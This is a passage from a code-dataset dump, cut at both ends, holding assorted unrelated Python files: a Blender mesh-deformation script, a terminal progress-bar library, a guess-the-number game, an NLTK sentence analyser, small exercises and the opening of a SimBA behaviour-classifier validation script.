(newnum[int(numLen/2)]+newnum[int((numLen/2)-1)])/2\n else:\n T = int(((numLen+1)/2)-1)\n median = newnum[T]\n \n return float(median)\n \n","sub_path":"MedianSortedArrays.py","file_name":"MedianSortedArrays.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"649314091","text":"#!/usr/bin/python\n# from setuptools\n# import setup\nimport os\n\n__author__ = \"Andre Christoga\"\ninput = raw_input(\"> (eg plus, minus, divide...)\")\n\nif input == \"plus\":\n\tos.system(\"pymain/plus.py\")\nif input == \"minus\":\n\tos.system(\"pymain/minus.py\")\nif input == \"multi\":\n\tos.system(\"pymain/multi.py\")\nif input == \"divide\":\n\tos.system(\"pymain/divide.py\")\nif input == \"modulos\":\n\tos.system(\"pymain/modulos.py\")\n\n# setup(\n# name=\"PyMaIn\",\n# version=\"1.0.0\",\n# author=\"Coding Smart School\",\n# author_email=\"codingsmartschool@gmail.com\",\n# url=\"https://github.com/codingsmartschool/pymain\",\n# description=\"Python Math Input\",\n# long_description=(\"PyMaIn is a python program that takes maths number\" \n# \" and give user the answer.\"),\n# classifiers=[\n# 'Development Status :: 4 - Beta',\n# 'Programming Language :: Python',\n# ],\n# license=\"MIT\",\n# packages=['pymain'],\n# )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"613608299","text":"import math\nimport sys\n\n# define some colors\n# ------------------------------------------------------------------------------\nBLACK = '\\033[30m'\nRED = '\\033[31m'\nGREEN = '\\033[32m'\nYELLOW = '\\033[33m'\nBLUE = '\\033[34m'\nMAGENTA = '\\033[35m'\nCYAN = '\\033[36m'\nWHITE = '\\033[37m'\nBRIGHT_RED = '\\033[91m'\nBRIGHT_GREEN = '\\033[92m'\nBRIGHT_YELLOW = '\\033[93m'\nBRIGHT_BLUE = '\\033[94m'\nBRIGHT_MAGENTA = '\\033[95m'\nBRIGHT_CYAN = '\\033[96m'\nBRIGHT_WHITE = '\\033[97m'\nENDC = '\\033[0m'\n\n\n# ------------------------------------------------------------------------------\ndef display_progress(count, total, old_percent, width=50, completed_char=\"#\",\n empty_char=\".\"):\n \"\"\"\n Draws and updates ASCII progress bar on the stdout.\n\n :param count: The current count for our progress bar.\n :param total: The count at 100%.\n :param old_percent: The previous percent. Necessary to prevent updates if\n the percentage has not changed since the last call.\n :param width: How wide to draw the progress bar in characters. If given an\n odd number, it will be rounded down to the nearest even value.\n :param completed_char: The character to display for a completed chunk.\n :param empty_char: The character to display for an as-yet uncompleted chunk.\n\n :return: The percent value for the current state.\n \"\"\"\n\n # only allow even numbered widths\n if width % 2 != 0:\n width -= 1\n\n # calculate the percent\n percent = round((count * 1.0) / total * 100, 1)\n\n # only update the display if the percentage has changed\n if percent == old_percent:\n return percent\n\n # build the completed and uncompleted portions of the progress bar\n done_str = \"{0}\".format(completed_char *\n (int(round(percent / (100 / width), 0))))\n empty_str = \"{0}\".format(empty_char *\n (width - (int(round(percent / (100 / width))))))\n\n # build the X out of Y text\n count_str = \" (\" + BRIGHT_WHITE + str(count) + ENDC + \" of \" + \\\n BRIGHT_WHITE + str(total) + ENDC + \")\"\n\n # build the percent string\n percent_str = \"{0}\".format(\" \" *\n (4 - len(str(int(math.floor(percent)))))) + str(percent) + \"%\" + \" \"\n\n # build the complete string, and insert the percent\n progress_bar_str = \"[\" + done_str + empty_str + \"]\"\n progress_left = progress_bar_str[:int((len(progress_bar_str) / 2) -\n math.floor(len(percent_str) / 2)) + 2]\n progress_right = progress_bar_str[int((len(progress_bar_str) / 2) +\n math.ceil(len(percent_str) / 2)) + 2:]\n progress_bar_str = progress_left\n progress_bar_str += BRIGHT_YELLOW + percent_str + ENDC\n progress_bar_str += progress_right\n\n # append the count string\n progress_bar_str += count_str\n\n # show it\n sys.stdout.write(progress_bar_str)\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (len(progress_bar_str))) # return to start of line\n\n # return the percent (so that we only update the percentage when it changes)\n return percent\n\n\n# ------------------------------------------------------------------------------\ndef display_error(*msgs):\n \"\"\"\n Given any number of args, converts those args to strings, concatenates them,\n and prints to stdErr.\n\n :return: Nothing.\n \"\"\"\n\n output = \"\"\n for msg in msgs:\n output += \" \" + str(msg)\n print(output.lstrip(\" \"), file=sys.stderr)\n\n\n# ------------------------------------------------------------------------------\ndef format_string(msg):\n \"\"\"\n Given a string (msg) this will format it with colors based on the {{COLOR}}\n tags. (example {{COLOR_RED}}). It will also convert literal \\n character\n string into a proper newline.\n\n :param msg: The string to format.\n\n :return: The formatted string.\n \"\"\"\n\n output = msg.replace(r\"\\n\", \"\\n\")\n output = output.replace(\"{{\", \"{\")\n output = output.replace(\"}}\", \"}\")\n\n output = output.format(\n COLOR_BLACK=BLACK,\n COLOR_RED=RED,\n COLOR_GREEN=GREEN,\n COLOR_YELLOW=YELLOW,\n COLOR_BLUE=BLUE,\n COLOR_MAGENTA=MAGENTA,\n COLOR_CYAN=CYAN,\n COLOR_WHITE=WHITE,\n COLOR_BRIGHT_RED=BRIGHT_RED,\n COLOR_BRIGHT_GREEN=BRIGHT_GREEN,\n COLOR_BRIGHT_YELLOW=BRIGHT_YELLOW,\n COLOR_BRIGHT_BLUE=BRIGHT_BLUE,\n COLOR_BRIGHT_MAGENTA=BRIGHT_MAGENTA,\n COLOR_BRIGHT_CYAN=BRIGHT_CYAN,\n COLOR_BRIGHT_WHITE=BRIGHT_WHITE,\n COLOR_NONE=ENDC,\n )\n\n return output\n\n\n# ------------------------------------------------------------------------------\ndef display_message(*msgs):\n \"\"\"\n Given any number of args, converts those args to strings, concatenates them,\n and prints to stdOut.\n\n :return: Nothing.\n \"\"\"\n\n print(\" \".join([str(item) for item in msgs]))\n","sub_path":"displayLib.py","file_name":"displayLib.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"596815100","text":"#!BPY\n\"\"\"Move stars (vertices of a mesh) to different forms,\ne.g. flat map or sphere, for nice shape-transformation\nanimations.\"\"\"\n# I assume that the stars are vertices of a few meshes,\n# as created by ravestars_mesh.py,\n# so I need to move vertices of a mesh, not objects.\n# Thus use shapekeys here.\n#\n# Kristin Riebe, E-Science at AIP, kriebe@aip.de, 27.10.2014\n\nimport bpy\nimport fnmatch\nfrom math import sqrt, acos, atan2, pi\n\n\ndef get_objects(namepattern):\n \"\"\"Get objects from all scenes matching the namepattern.\n namepattern -- string regular expression\n \"\"\"\n\n objects = [obj for obj in bpy.data.objects\n if fnmatch.fnmatchcase(obj.name, namepattern)]\n\n # if only selectable and not-hidden objects, use:\n # bpy.ops.object.select_pattern(pattern=name)\n # if only objects of current scene, use:\n # bpy.context.scene.objects\n return objects\n\n\ndef shapekey_vertices_to_sphere(obj, keyname, parameters):\n \"\"\"Move vertices of mesh to a sky-sphere, using shapekey\n obj -- mesh-object with stars as vertices\n keyname -- name for shapekey (e.g. 'KeySphere')\n parameters -- dictionary of necessary parameters,\n here: rsphere for radius of sphere\n \"\"\"\n\n rsphere = parameters[\"rsphere\"]\n\n bpy.ops.object.select_all(action='DESELECT')\n\n print(\"Adding sphere-shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n\n obj.select = True\n\n # Add shape keys for modifying vertices of the mesh\n shapekey = m.shape_key_add(name=keyname, from_mix=True)\n shapekey.value = 1\n\n for p in shapekey.data:\n\n r = sqrt(p.co.x*p.co.x + p.co.y*p.co.y + p.co.z*p.co.z)\n\n scale = rsphere*1./r\n\n p.co.x = p.co.x * scale\n p.co.y = p.co.y * scale\n p.co.z = p.co.z * scale\n\n shapekey.value = 0\n m.active_shape_key_index = 0\n obj.select = False\n\n return shapekey\n\n\ndef shapekey_vertices_to_map(obj, keyname, parameters):\n \"\"\"Move vertices of mesh to a flat, equirectangular map\n obj -- mesh-object with stars as vertices\n keyname -- name for shapekey\n parameters -- dictionary of necessary parameters,\n here:\n mapw -- width of the map\n maph -- height of the map\n \"\"\"\n\n mapw, maph = parameters[\"mapw\"], parameters[\"maph\"]\n\n bpy.ops.object.select_all(action='DESELECT')\n\n print(\"Adding map-shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n\n obj.select = True\n\n # Add shape keys for modifying vertices of the mesh\n shapekey = m.shape_key_add(name=keyname, from_mix=True)\n shapekey.value = 1\n\n for p in shapekey.data:\n\n r = sqrt(p.co.x*p.co.x + p.co.y*p.co.y + p.co.z*p.co.z)\n\n theta = acos(p.co.z/r)\n phi = atan2(p.co.y, p.co.x)\n\n p.co.x = -(phi/(2*pi)*mapw) # - 0.5*mapw\n p.co.y = 0\n p.co.z = -(theta/(pi)*maph - 0.5*maph)\n\n shapekey.value = 0\n m.active_shape_key_index = 0\n\n obj.select = False\n\n return shapekey\n\n\ndef make_basis_shapekeys(objects, basisname):\n \"\"\"Create basis shapekey for matching objects\n objects -- list of objects to be used\n basisname -- name for basis shapekey\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.select_pattern(pattern=namepattern)\n objects = bpy.context.selected_objects\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n print(\"Adding basis shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n obj.select = True\n\n basis = m.shape_key_add(name=basisname)\n\n return\n\n\ndef make_shapekeys(objects, keyname, formtype, parameters):\n \"\"\"Create shapekeys for given formtype for all matching objects\n objects -- list of objects to be used\n keyname -- name for shapekey\n formtype -- type of form, e.g. 'SPHERE' or 'MAP'\n parameters -- dictionary of necessary parameters, e.g. rsphere, maph;\n see individual functions for what is needed.\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n m = bpy.data.objects[obj.name]\n obj.select = True\n\n # Add shapekeys depending on given formtype\n if formtype == 'SPHERE':\n key = shapekey_vertices_to_sphere(obj, keyname, parameters)\n elif formtype == 'MAP':\n key = shapekey_vertices_to_map(obj, keyname, parameters)\n else:\n raise RuntimeError(\"There is no function implemented for \\\n formtype='%s' yet.\" % formtype)\n\n return\n\n\ndef delete_shapekeys(objects):\n \"\"\"Delete shapekeys of objects\"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n # Select, set active, then delete all shapekeys\n obj.select = True\n bpy.context.scene.objects.active = obj\n\n if obj.data.shape_keys is not None:\n bpy.ops.object.shape_key_remove(all=True)\n print(\"Shapekeys for %s deleted.\" % obj.name)\n\n obj.select = False\n\n return\n\n\ndef add_shape_animation(objects, keyname0, iframe0, keyname1, iframe1):\n \"\"\"Add animation keyframes for shapekeys\n objects -- list of objects to be used\n keyname0 -- name of basis/previous shapekey\n iframe0 -- frame at which new shapekey value is 0, keyframed\n keyname1 -- name of new shapekey\n iframe1 -- frame at which new shape gets value 1, keyframed\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n m = bpy.data.objects[obj.name]\n\n # Select the object\n obj.select = True\n\n # Set the keyframes for this object\n keyblocks = m.data.shape_keys.key_blocks\n key0 = keyblocks[keyname0]\n key1 = keyblocks[keyname1]\n\n # Initial shape, value of new shapekey is 0\n iframe = iframe0\n key0.value = 1\n key1.value = 0\n key0.keyframe_insert(data_path=\"value\", frame=iframe)\n key1.keyframe_insert(data_path=\"value\", frame=iframe)\n\n # New shape with key1\n iframe = iframe1\n key0.value = 0\n key1.value = 1\n key0.keyframe_insert(data_path=\"value\", frame=iframe)\n key1.keyframe_insert(data_path=\"value\", frame=iframe)\n\n obj.select = False\n\n return\n\n\nif __name__ == '__main__':\n\n # Set parameters: sphere radius, width and height of flat map\n rsphere = 2.\n\n mapw = 7.5\n maph = 4.5\n\n # Set string pattern for the star-meshes\n namepattern = 'stars-*'\n\n # Get objects based on namepattern\n objects = get_objects(namepattern)\n\n # Set names for shapekeys (just for user convenience)\n basisname = 'Basis'\n mapkeyname = 'KeyMap'\n spherekeyname = 'KeySphere'\n\n # Delete *all* shapekeys and animation keyframes.\n # Be careful: this may do more than you want.\n delete_shapekeys(objects)\n\n # Make basis shapekey\n make_basis_shapekeys(objects, basisname)\n\n # Add sphere-shapekey\n parameters = {\"rsphere\": rsphere}\n make_shapekeys(objects, spherekeyname, 'SPHERE', parameters)\n\n # Add map-shapekey\n parameters = {\"mapw\": mapw, \"maph\": maph}\n make_shapekeys(objects, mapkeyname, 'MAP', parameters)\n\n # Add animations. Go backwards, because want initial distribution\n # at the end.\n\n # Set keyframes for animations\n imap1 = 0\n imap2 = 30\n isphere1 = 100\n isphere2 = 170\n ibasis = 230\n\n add_shape_animation(objects, basisname, ibasis, spherekeyname, isphere2)\n add_shape_animation(objects, spherekeyname, isphere1, mapkeyname, imap2)\n\n print(\"\\nDone.\")\n","sub_path":"deform_starmesh.py","file_name":"deform_starmesh.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20896203","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport subprocess\n\n\n\n#graph_names = ['amazon.txt', 'msdoor.txt', 'google.txt', 'roadnetca.txt','soclivejournal.txt', 'road-cal.txt']\n\ngraph_names = ['msdoor.txt', 'road-cal.txt']\n\ngraph_names = [os.path.join(os.path.dirname(__file__), i) for i in graph_names]\n\ngraph_names = [\"graphs/\" + i for i in graph_names]\n\nbinary_name = \"./sssp\"\n\nexe_args_list = []\n\nfor graph in graph_names:\n #for x in ((256, 8), (384, 5), (512, 4), (768, 2), (1024, 2)):\n for x in [(512, 32)]:\n blocksize = str(x[0])\n blocknum = str(x[1])\n\n # shared memory, with bmf, sorted by destination, only only sorted by\n # destination and only for the BMF\n #exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\", blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\", \"--method\", \"bmf\", \"--sync\", \"outcore\", \"--sort\", \"yes\", \"--usesmem\", \"yes\"])\n \n exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\",\n blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\",\n \"--method\", \"bmf\", \"--sync\", \"incore\", \"--sort\", \"yes\", \"--usesmem\",\n \"no\"])\n\"\"\"\n for sort in (\"yes\", \"no\"):\n for method in [\"tpe\", \"bmf\"]:\n for sync in (\"outcore\", \"incore\"):\n exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\",\n blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\",\n \"--method\", method, \"--sync\", sync, \"--sort\", sort, \"--usesmem\",\n \"no\"])\n\"\"\"\n\n\ntry: \n with open(\"benchmark_results.txt\", 'w') as f:\n count = 0\n for exe in exe_args_list:\n compl_time = subprocess.check_output(exe, stderr = subprocess.STDOUT).decode('utf-8') \n\n if(exe[-1] == \"yes\"):\n time = compl_time.split(\"\\n\")[5].split(\" \")[1]\n iter_c = compl_time.split(\"\\n\")[6].split(\" \")[1]\n\n f.write(\"\"\"Graph: {}, Method: BMF Shared, Block Configuration:({} {})\\nTime: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[4], exe[6], time, iter_c))\n\n elif(exe[10] == \"tpe\"):\n k_time = compl_time.split(\"\\n\")[5].split(\" \")[-2]\n f_time = compl_time.split(\"\\n\")[6].split(\" \")[-2]\n t_time = compl_time.split(\"\\n\")[7].split(\" \")[-2]\n iter_c= compl_time.split(\"\\n\")[8].split(\" \")[1]\n \n f.write(\"\"\"Graph: {}, Method: TPE {} {}, Block Configuration: ({} {})\\nK_time: {}, F_Time:{}, T_time: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[12], exe[-3], exe[4], exe[6], k_time, f_time, t_time, iter_c))\n\n else:\n time = compl_time.split(\"\\n\")[5].split(\" \")[1]\n iter_c = compl_time.split(\"\\n\")[6].split(\" \")[1]\n\n f.write(\"\"\"Graph: {}, Method: BMF {} {}, Block Configuration: ({} {})\\nTime: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[12],\n exe[-3], exe[4], exe[6], time, iter_c))\n\n\n \n print(\"Processed {} of {}\".format(count, len(exe_args_list)))\n count +=1\n \n\nexcept subprocess.CalledProcessError as e:\n print(\"Command '\" + str(e.cmd)+ \"'failed!\")\n print(\"Output:\")\n print(e.output)\n","sub_path":"implementation/benchmarker.py","file_name":"benchmarker.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338085831","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\n\nclass Test(QWidget):\n\n def __init__(self):\n QWidget.__init__(self)\n self.setWindowTitle(\"IHM\")\n self.setMinimumSize(500, 300)\n\n self.layout = QHBoxLayout()\n self.Barre = QProgressBar()\n self.Curseur = QSlider(Qt.Vertical)\n\n self.layout.addWidget(self.Barre)\n self.layout.addWidget(self.Curseur)\n\n self.Curseur.valueChanged.connect(self.Signal)\n\n self.setLayout(self.layout)\n\n def Signal(self):\n self.Slot(self.Curseur.value())\n self.show()\n\n def Slot(self,value):\n self.Barre.setValue(self.Curseur.value())\n\nif __name__ == \"__main__\":\n app = QApplication([])\n win = Test()\n win.show()\n app.exec_()\n","sub_path":"Exercice 2.py","file_name":"Exercice 2.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"184780308","text":"\"\"\"\nProvides functionality to btns in the __main__.py file.\n\"\"\"\n\nimport json\nimport clsHS\nfrom random import randint\nfrom tkinter import messagebox\n\n\nclass Funcs:\n\n def __init__(self, ui, file='guess the number/high-scores.json'):\n self.main = ui\n self._jsonFile = file\n self._diff = 'not set'\n self._tries = 0\n self._difficulties = ['easyDifficulty', 'mediumDifficulty', 'hardDifficulty']\n\n self.findHighScorers()\n\n def findHighScorers(self):\n \"\"\"\n Finds the high scorers in each difficulty as a dict.\\n\n :return: dict\n \"\"\"\n with open(self._jsonFile) as f:\n self._scores = json.load(f)\n\n easyHighScorer = list(self._scores['easyDifficulty'].keys())[0]\n mediumHighScorer = list(self._scores['mediumDifficulty'].keys())[0]\n hardHighScorer = list(self._scores['hardDifficulty'].keys())[0]\n\n eTries = self._scores['easyDifficulty'][easyHighScorer]\n mTries = self._scores['mediumDifficulty'][mediumHighScorer]\n hTries = self._scores['hardDifficulty'][hardHighScorer]\n\n return {easyHighScorer: eTries, mediumHighScorer: mTries, hardHighScorer: hTries}\n\n def showHighScorers(self):\n \"\"\"\n Finds and displays the high scorers in the main UI window.\\n\n :return: None\n \"\"\"\n self.findHighScorers()\n self.main._ezyHS.set(list(self._scores['easyDifficulty'].keys()))\n self.main._medHS.set(list(self._scores['mediumDifficulty'].keys()))\n self.main._hardHS.set(list(self._scores['hardDifficulty'].keys()))\n\n self.main._eTries.set(list(self._scores['easyDifficulty'].values()))\n self.main._mTries.set(list(self._scores['mediumDifficulty'].values()))\n self.main._hTries.set(list(self._scores['hardDifficulty'].values()))\n\n def writeHighScorers(self, diff, score):\n \"\"\"\n Writes to the json file in the difficulty and a dict of scorer and tries.\\n\n :param diff: str\\n\n :param score: dict = {scorer: tries}\\n\n :return: None\n \"\"\"\n with open(self._jsonFile) as f:\n storedData = json.load(f)\n\n storedData[diff] = score\n\n with open(self._jsonFile, 'w') as f:\n json.dump(storedData, f, indent=4)\n\n self.showHighScorers()\n\n def changeDiff(self):\n \"\"\"\n Changes the set difficulty.\\n\n :return: None\n \"\"\"\n if self._diff != 'not set':\n response = messagebox.askokcancel('Do you want to continue?',\n 'Proceeding will reset your tries and you will have to start over.')\n\n if response:\n self.reset()\n else:\n return\n else:\n return\n\n def setRandomNumber(self, diff):\n \"\"\"\n Sets a random number based on the given difficulty.\\n\n :param diff: str\\n\n :return: None\n \"\"\"\n self.main.tries = 0\n self.main.disableButtons()\n\n if diff == 'e':\n self._diff = 'easyDifficulty'\n self._randomInt = randint(0, 10)\n self.main._selectedDiff.set('Difficulty: Easy')\n # print(self.main.randint)\n elif diff == 'm':\n self._diff = 'mediumDifficulty'\n self._randomInt = randint(0, 100)\n self.main._selectedDiff.set('Difficulty: Medium')\n # print(self.main.randint)\n else:\n self._diff = 'hardDifficulty'\n self._randomInt = randint(0, 500)\n self.main._selectedDiff.set('Difficulty: Hard')\n # print(self.main.randint)\n\n def verify(self, *args):\n \"\"\"\n Verifies the user's guess.\\n\n :param args: event\\n\n :return: None\n \"\"\"\n num = self.main.getNum()\n name = self.main.getName()\n\n if name != '':\n if self._diff != 'not set':\n if num is not None:\n try:\n num = int(num)\n self._tries += 1\n self.main._tries.set('Tries: ' + str(self._tries))\n self.evalEntry(num, name)\n self.main.clearNumEntry()\n except ValueError:\n self.main._result.set('Please enter a number.')\n self.main.clearNumEntry()\n else:\n self.main._result.set('Please enter a number.')\n else:\n self.main._result.set('Please select a difficulty.')\n else:\n self.main._result.set('Please enter your name.')\n\n def evalEntry(self, num, name):\n \"\"\"\n Evaluates the user guess.\\n\n :param num: int\\n\n :param name: name of user\\n\n :return: None\n \"\"\"\n hints = ['Too low, try again!', 'Too high, try again!', 'Almost there, try higher!', 'Almost there, try lower!']\n compliments = ['Great!', 'Awesome!', 'Superb!', 'Bravo!', 'Wow!', 'Amazing!']\n\n if num < self._randomInt:\n difference = abs(num - self._randomInt)\n if difference > 10:\n self.main._result.set(hints[0])\n elif difference <= 10:\n self.main._result.set(hints[2])\n elif num > self._randomInt:\n difference = abs(num - self._randomInt)\n if difference > 10:\n self.main._result.set(hints[1])\n elif difference <= 10:\n self.main._result.set(hints[3])\n else:\n messagebox.showinfo(compliments[randint(0, 5)],\n 'You got it right in ' + str(self._tries) + ' tries!')\n self.main.clearNumEntry()\n self.main.enableButtons()\n\n if list(self._scores[self._diff].values())[0] is None:\n self.writeHighScorers(self._diff, {name: self._tries})\n self.showHighScorers()\n elif self._tries < list(self._scores[self._diff].values())[0]:\n self.writeHighScorers(self._diff, {name: self._tries})\n self.showHighScorers()\n\n self._tries = 0\n self.main._tries.set('Tries: ' + str(self._tries))\n self._diff = 'not set'\n self.main._selectedDiff.set('Difficulty:')\n\n self.reset()\n self.showHighScorers()\n\n def launchClearHS(self):\n \"\"\"\n Launches the clear window.\\n\n :return: None\n \"\"\"\n clsWindow = clsHS.Clear(self)\n clsWindow.winActivate()\n\n def clsHs(self):\n \"\"\"\n Clears the high scores\\n\n :return:\n \"\"\"\n for diff in self._difficulties:\n self.writeHighScorers(diff, {'None': None})\n self._clearHighScores = False\n\n self.showHighScorers()\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets the UI.\\n\n :return: None\n \"\"\"\n self._tries = 0\n self.main._tries.set('Tries: ' + str(self._tries))\n self.main._selectedDiff.set('Difficulty:')\n self.main._result.set('')\n self.main.clearNumEntry()\n self.main.enableButtons()\n","sub_path":"btnFuncs.py","file_name":"btnFuncs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"99861477","text":"N = int(input())\nab = []\nfor _ in range(N):\n a,b = map(int,input().split())\n ab.append((a,b))\ncd = []\nfor _ in range(N):\n c,d = map(int,input().split())\n cd.append((c,d))\n\nab.sort(reverse=True)\ncd.sort(reverse=True)\n\ncnt = 0\nfor i in ab:\n for j in range(N):\n if i[0] < cd[i][0] and i[1] < cd[i][1]:\n cnt += 1\n break\n\nprint(cnt)\n","sub_path":"ABC091/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"604068410","text":"import matplotlib.pyplot as plt\nimport csv\n\nx = []\n\nwith open('RL_EXP_OUT.dat','r') as csvfile:\n plots = csv.reader(csvfile)\n for row in plots:\n x.append(row[0])\n\nplt.ylim(ymax = 1.0)\nplt.plot(x, label='alpha = 0.1\\nepsilon = 0.0\\nQ_1 = 5')\nplt.legend()\nplt.show()\n","sub_path":"Assignment 1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363861871","text":"# Imports\nimport nltk\nimport string\nfrom nltk.corpus import wordnet\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\n''' Analyses sentences '''\nclass SentenceAnalyser():\n \n \n # Initialise\n def __init__(self):\n \n # Tokenizer\n self.tokenizer = nltk.tokenize.TweetTokenizer()\n \n # Lemmatizer\n self.lemmatizer = nltk.WordNetLemmatizer()\n \n # Vader intensity analyser\n self.sentiment_analyser = SentimentIntensityAnalyzer()\n \n # Weighting for parts of speech\n self.pos_weighting = {\n \"a\" : 1,\n \"v\" : 1,\n \"r\" : 1,\n \"n\" : 1, \n None : 1, \n }\n \n ''' Processes a sentence into a list containing word objects '''\n def process(self, sentence):\n \n # Tokenise\n tokenized = self.tokenizer.tokenize(sentence)\n \n # Tag parts of speech\n pos_tagged = nltk.pos_tag(tokenized)\n \n # Lemmatize\n lemmatized_pos_tagged = [(self.lemmatizer.lemmatize(tagged_tuple[0]), tagged_tuple[1]) for tagged_tuple in pos_tagged]\n\n # Convert tagged tuple to words\n word_list = [Word(tagged_tuple[0], tagged_tuple[1]) for tagged_tuple in lemmatized_pos_tagged]\n\n # Return\n return Sentence(word_list, self.sentiment_analyser.polarity_scores(sentence))\n\n ''' Calculates the similarity score for two sentences based on the words that they contain '''\n def diff(self, sentence, sentence2):\n \n # Similarities\n similarities = 0\n \n # Sentence synsets\n word_list_raw, word_list_raw2 = self.process(sentence), self.process(sentence2)\n \n # Padded lists\n word_list, word_list2 = self.__pad_list__(word_list_raw, word_list_raw2)\n \n # Iterate through synset list\n for word in word_list_raw:\n \n # Iterate through other synset list\n for word2 in word_list_raw2:\n \n # Check if words are equivalent\n if word.equivalent(word2): similarities += self.pos_weighting[synsets_tagged[1]]\n \n # Bigger & smaller sentence\n bigger, smaller = word_list, word_list2 if len(word_list) > len(word_list2) else word_list2, word_list\n \n # Calculate simscore\n sim_score = similarities / len(smallest)\n \n # Return\n return sim_score\n \n # Pads the smaller list to be equal to the length of the bigger list\n def __pad_list__(self, word_list, word_list2):\n \n # Bigger & smaller lists\n bigger, smaller = word_list, word_list2 if len(word_list) > len(word_list2) else word_list2, word_list\n \n # Get amount to pad\n pad_amount = len(bigger) - len(smaller)\n \n # Pad\n for i in range(0, pad_amount):\n \n # Append none to smallest\n smallest.append(None)\n \n # Return\n return smallest, largest\n \n'''Provides an abstraction over Nltk's Synsets'''\nclass Word():\n \n # Initialise\n def __init__(self, word_string, pos):\n \n # Word string\n self.word_string = word_string\n \n # Word part of speech\n self.pos = pos\n \n # Check if POS has wordnet equivalent\n self.pos_wn = pos_to_wn(self.pos)\n self.pos_wn = self.pos_wn if self.pos_wn != self.pos else self.pos\n \n # Synsets\n self.synsets = wordnet.synsets(self.word_string, self.pos_wn) if self.pos[0] in string.ascii_letters and self.pos_wn != self.pos else [self.word_string]\n \n ''' Checks if two words are equivalent '''\n def equivalent(self, word_object): return not self.synsets.isdisjoint(word_object.synsets)\n\n''' Sentence object '''\nclass Sentence():\n \n # Initialise\n def __init__(self, word_list, semantics): \n \n self.word_list, self.semantics = word_list, semantics\n\n''' Takes an NLTK part-of-speech tag and returns the WordNet equivalent tag. Returns none if there is no equivalent '''\ndef pos_to_wn(pos):\n \n if pos.startswith(\"J\"): return \"a\"\n elif pos.startswith(\"V\"): return \"v\"\n elif pos.startswith(\"N\"): return \"n\"\n elif pos.startswith(\"R\"): return \"r\"\n else: return pos\n ","sub_path":"src/main/python/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"351363890","text":"import warnings\r\nwarnings.filterwarnings('ignore',category=FutureWarning)\r\nwarnings.filterwarnings('ignore',category=DeprecationWarning)\r\nimport pickle\r\nfrom configparser import ConfigParser, NoOptionError\r\nimport os\r\nimport pandas as pd\r\nfrom simba.drop_bp_cords import drop_bp_cords\r\nimport warnings\r\nfrom simba.rw_dfs import *\r\n\r\nwarnings.simplefilter(action='ignore', category=FutureWarning)\r\n\r\ndef validate_model_one_vid_1stStep(inifile,csvfile,savfile):\r\n configFile = str(inifile)\r\n config = ConfigParser()\r\n config.read(configFile)\r\n try:\r\n wfileType = config.get('General settings', 'workflow_file_type')\r\n except NoOptionError:\r\n wfileType = 'csv'\r\n sample_feature_file = str(csvfile)\r\n sample_feature_file_Name = os.path.basename(sample_feature_file)\r\n sample_feature_file_Name = sample_feature_file_Name.split('.', 1)[0]\r\n classifier_path = savfile\r\n classifier_name = os.path.basename(classifier_path).replace('.sav','')\r\n inputFile = read_df(sample_feature_file, wfileType)\r\n inputFile = inputFile.loc[:, ~inputFile.columns.str.contains('^Unnamed')]\r\n inputFile = inputFile.drop(['scorer'], axis=1, errors='ignore')\r\n inputFile.to_csv('test.csv')\r\n outputDf = inputFile\r\n inputFileOrganised = drop_bp_cords(inputFile, inifile)\r\n print('Running model...')\r\n clf = pickle.load(open(classifier_path, 'rb'))\r\n ProbabilityColName = 'Probability_' + classifier_name\r\n predictions = clf.predict_proba(inputFileOrganised)\r\n outputDf[ProbabilityColName] = predictions[:, 1]\r\n\r\n # CREATE LIST OF GAPS BASED ON SHORTEST BOUT\r\n vidInfPath = config.get('General settings', 'project_path')\r\n vidInfPath = os.path.join(vidInfPath, 'logs', 'video_info.csv')\r\n vidinfDf = pd.read_csv(vidInfPath)\r\n fps = 